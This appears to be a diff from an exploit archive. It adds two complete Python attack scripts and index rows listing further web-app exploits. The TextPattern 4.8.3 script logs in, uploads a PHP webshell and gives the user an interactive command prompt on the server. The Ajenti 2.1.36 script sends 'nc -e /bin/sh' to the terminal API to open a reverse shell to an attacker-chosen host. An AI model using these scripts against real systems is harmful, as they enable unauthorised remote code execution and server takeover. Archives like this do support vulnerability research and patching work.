@@ -0,0 +1,158 @@
+#!/usr/bin/python3
+
+# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
+# Google Dork: N/A
+# Date: 16/10/2020
+# Exploit Author: Michele '0blio_' Cisternino
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://github.com/textpattern/textpattern
+# Version: <= 4.8.3
+# Tested on: Kali Linux x64
+# CVE: N/A
+
+import sys
+import json
+import requests
+from bs4 import BeautifulSoup as bs4
+from time import sleep
+import random
+import string
+import readline
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Simple Terminal User Interface class I wrote to print run-time logs and headers
+class Tui ():
+    def __init__ (self):
+        self.red = '\033[91m'
+        self.green = '\033[92m'
+        self.blue = '\033[94m'
+        self.yellow = '\033[93m'
+        self.pink = '\033[95m'
+        self.end = '\033[0m'
+        self.bold = '\033[1m'
+
+    def header (self, software, author, cve='N/A'):
+        print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
+        print ("{}CVE:{} {}".format(self.pink, self.end, cve))
+        print ("{}Author:{} {}\n".format(self.pink, self.end, author))
+
+    def info (self, message):
+        print ("[{}*{}] {}".format(self.blue, self.end, message))
+
+    def greatInfo (self, message):
+        print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
+
+    def success (self, message):
+        print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
+
+    def warning (self, message):
+        print ("[{}!{}] {}".format(self.yellow, self.end, message))
+
+    def error (self, message):
+        print ("[{}✗{}] {}".format(self.red, self.end, message))
+
+log = Tui()
+log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
+
+if len(sys.argv) < 4:
+    log.info ("USAGE: python3 exploit.py http://target.com username password")
+    log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
+    sys.exit()
+
+# Get input from the command line
+target, username, password = sys.argv[1:4]
+
+# Fixing URL
+target = target.strip()
+if not target.startswith("https://") and not target.startswith("http://"):
+    target = "http://" + target
+if not target.endswith("/"):
+    target = target + "/"
+
+accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
+
+# Login
+log.info ("Authenticating to the target as '{}'".format(username))
+s = requests.Session()
+try:
+    r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
+    sleep(1)
+    if r.status_code == 200:
+        log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
+        sleep(1)
+
+        # Parsing the response to find the upload token inside the main json array
+        log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
+        soup = bs4(r.text, 'html.parser')
+        scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
+        scriptJS = json.loads(scriptJS)
+        uploadToken = scriptJS['_txp_token']
+        log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
+
+    # The server reply with a 401 with the user provide wrong creds as input
+    elif r.status_code == 401:
+        log.error ("Unable to login. You provided wrong credentials..\n")
+        sys.exit()
+except requests.exceptions.ConnectionError:
+    log.error ("Unable to connect to the target!")
+    sys.exit()
+
+# Crafting the upload request here
+headers = {
+    "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+    "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
+    "Accept-Encoding" : "gzip, deflate",
+    "X-Requested-With" : "XMLHttpRequest",
+    "Connection" : "close",
+}
+
+# Generating random webshell name
+randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
+
+# Mapping multiparts here
+multipart_form_data = {
+    "fileInputOrder" : (None, '1/1'),
+    "app_mode" : (None, 'async'),
+    "MAX_FILE_SIZE" : (None, '2000000'),
+    "event" : (None, 'file'),
+    "step" : (None, 'file_insert'),
+    "id" : (None, ' '),
+    "_txp_token" : (None, uploadToken), # Token here
+    "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
+}
+
+# Uploading the webshell
+log.warning ("Sending payload..")
+
+try:
+    r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
+    if "Files uploaded" in r.text:
+        log.success ("Webshell uploaded successfully as {}".format(randomFilename))
+except:
+    log.error ("Unexpected error..")
+    sys.exit()
+
+sleep(2)
+
+# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
+log.greatInfo ("Interacting with the HTTP webshell..")
+sleep (1)
+print()
+
+while 1:
+    try:
+        cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
+        if cmd == 'exit':
+            raise KeyboardInterrupt
+        r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
+        print (r.text)
+    except KeyboardInterrupt:
+        log.warning ("Stopped.")
+        exit()
+    except:
+        log.error ("Unexpected error..")
+        sys.exit()
+
+print()

exploits/python/webapps/48929.py

@@ -0,0 +1,53 @@
+ #!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+import json
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+req = requests.session()
+login_creds = {
+    "username":username,
+    "password":password,
+    "mode":"normal"}
+      
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/api/core/auth", json = login_creds)
+
+
+if username in login.text:
+
+    page = url + "/api/terminal/create"
+
+    payload = {
+
+            'command':'nc -e /bin/sh ' + ip + ' ' + port ,
+            'autoclose':True
+
+
+          }
+    payload = json.dumps(payload)
+    print("[+] Sending payload...")
+    
+    send_payload = req.post(page, payload)
+    
+    print("[+] Check your listener !...")
+
+else:
+    print("[-] Wrong credentials or may the system patched.")
+    exit()

files_exploits.csv

@@ -40746,6 +40746,22 @@ id,file,description,date,author,type,platform,port
 48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
 48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
 48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
+48928,exploits/php/webapps/48928.txt,"Online Library Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,
+48930,exploits/php/webapps/48930.txt,"Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48931,exploits/php/webapps/48931.txt,"Car Rental Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48933,exploits/php/webapps/48933.txt,"Point of Sales 1.0 - 'id' SQL Injection",2020-10-23,"Ankita Pal",webapps,php,
+48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,
+48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,
+48936,exploits/php/webapps/48936.txt,"Gym Management System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48937,exploits/php/webapps/48937.txt,"Point of Sales 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48938,exploits/php/webapps/48938.txt,"School Faculty Scheduling System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48939,exploits/php/webapps/48939.txt,"School Faculty Scheduling System 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,
+48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
+48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
+48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,